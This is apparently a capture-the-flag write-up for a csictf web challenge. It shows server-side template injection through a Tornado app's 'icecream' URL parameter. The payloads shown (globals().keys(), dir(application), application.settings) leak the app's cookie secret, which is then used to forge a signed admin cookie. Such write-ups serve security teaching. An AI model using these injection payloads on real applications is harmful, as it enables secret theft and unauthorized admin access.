by anishbadhri
You may think I walk with no 'name' because it can be changed whenever I want. I am a 'person' whose 'secret' can never be found. Can you find this 'person's 'secret'?
The website consists of a <select>
with chocolate, vanilla and butterscotch. On selecting one and submitting, a message is displayed.
On inspecting the url, it is seen that the parameter icecream is used as, icecream={{chocolate}}
. This makes it clear that script injection can be done. By inserting some random string like {{strawberry}}
, we can see that an error is thrown, but it is visible that the parameter is inserted into a py
file. Thus, python scripts can be inserted as a parameter.
The python function globals()
can be used to view all files. Inserting {{globals().keys()}}
, a list of variables used in the code is obtained.
1 | dict_keys(['escape', 'xhtml_escape', 'url_escape', 'json_encode', 'squeeze', 'linkify', 'datetime', '_tt_utf8', '_tt_string_types', '__name__', '__loader__', 'chocolate', 'vanilla', 'butterscotch', 'application', 'secret', '__builtins__', '_tt_execute']) |
The next step would be to find out which variable to use in this. On entering the webpage, a cookie called admin
is set to false
. This cookie is a Tornado cookie. To create a new token with admin
as true
, a secret key would be needed. This secret key is in the Tornado application object.
There is an application
object as seen in the result of globals(). To find the members of this object, dir(application)
can be sent as a parameter to the page.
1 | ['__call__', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_load_ui_methods', '_load_ui_modules', 'add_handlers', 'add_transform', 'default_host', 'default_router', 'find_handler', 'get_handler_delegate', 'listen', 'log_request', 'on_close', 'reverse_url', 'settings', 'start_request', 'transforms', 'ui_methods', 'ui_modules', 'wildcard_router'] |
With the settings
object, passing application.settings
returns the cookie secret. 'cookie_secret': 'MangoDB\n'
. This can be used to create a signed token of admin
as true
Solution Script:
1 | import tornado.ioloop |
1 | csictf{h3r3_i_4m} |